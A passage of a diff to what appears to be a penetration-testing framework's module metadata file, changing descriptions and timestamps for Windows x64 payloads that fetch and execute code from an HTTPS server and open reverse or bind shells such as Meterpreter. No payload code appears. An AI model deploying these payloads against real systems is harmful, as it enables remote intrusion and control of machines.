"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_tcp_uuid",
|
||||
@@ -203902,7 +204263,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203912,7 +204273,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_winhttp",
|
||||
@@ -203944,7 +204305,7 @@
|
||||
"bwatters-r7",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203954,7 +204315,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/custom/reverse_winhttps",
|
||||
@@ -203986,7 +204347,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -203996,7 +204357,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/encrypted_shell/reverse_tcp",
|
||||
@@ -204028,7 +204389,7 @@
|
||||
"Matt Graeber",
|
||||
"Shelby Pace"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn an encrypted command shell",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -204038,7 +204399,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/encrypted_shell_reverse_tcp",
|
||||
@@ -204067,7 +204428,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nExecute an arbitrary command (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nExecute an arbitrary command (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -204077,7 +204438,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/exec",
|
||||
@@ -204107,7 +204468,7 @@
|
||||
"scriptjunkie",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nLoad an arbitrary x64 library path",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nLoad an arbitrary x64 library path",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -204117,7 +204478,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/loadlibrary",
|
||||
@@ -204146,7 +204507,7 @@
|
||||
"Brendan Watters",
|
||||
"pasta <jaguinaga@infobytesec.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a dialog via MessageBox using a customizable title, text & icon",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -204156,7 +204517,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/messagebox",
|
||||
@@ -204187,7 +204548,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204198,7 +204559,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp",
|
||||
@@ -204231,7 +204592,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204242,7 +204603,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_ipv6_tcp_uuid",
|
||||
@@ -204276,7 +204637,7 @@
|
||||
"OJ Reeves",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204287,7 +204648,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_named_pipe",
|
||||
@@ -204320,7 +204681,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204331,7 +204692,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp",
|
||||
@@ -204368,7 +204729,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204379,7 +204740,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_rc4",
|
||||
@@ -204412,7 +204773,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204423,7 +204784,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/bind_tcp_uuid",
|
||||
@@ -204456,7 +204817,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204467,7 +204828,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_http",
|
||||
@@ -204503,7 +204864,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204514,7 +204875,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_https",
|
||||
@@ -204547,7 +204908,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204558,7 +204919,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_named_pipe",
|
||||
@@ -204591,7 +204952,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204602,7 +204963,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp",
|
||||
@@ -204639,7 +205000,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204650,7 +205011,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_rc4",
|
||||
@@ -204683,7 +205044,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204694,7 +205055,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_tcp_uuid",
|
||||
@@ -204727,7 +205088,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204738,7 +205099,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttp",
|
||||
@@ -204771,7 +205132,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204782,7 +205143,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter/reverse_winhttps",
|
||||
@@ -204815,7 +205176,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204826,7 +205187,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_bind_named_pipe",
|
||||
@@ -204856,7 +205217,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect to victim and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204867,7 +205228,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_bind_tcp",
|
||||
@@ -204897,7 +205258,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204908,7 +205269,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_reverse_http",
|
||||
@@ -204938,7 +205299,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204949,7 +205310,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_reverse_https",
|
||||
@@ -204979,7 +205340,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -204990,7 +205351,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_reverse_ipv6_tcp",
|
||||
@@ -205020,7 +205381,7 @@
|
||||
"OJ Reeves",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a Meterpreter shell. Requires Windows XP SP2 or newer.",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -205031,7 +205392,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/meterpreter_reverse_tcp",
|
||||
@@ -205061,7 +205422,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205071,7 +205432,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp",
|
||||
@@ -205104,7 +205465,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205114,7 +205475,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_ipv6_tcp_uuid",
|
||||
@@ -205146,7 +205507,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205156,7 +205517,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_named_pipe",
|
||||
@@ -205188,7 +205549,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205198,7 +205559,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_tcp",
|
||||
@@ -205235,7 +205596,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205245,7 +205606,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
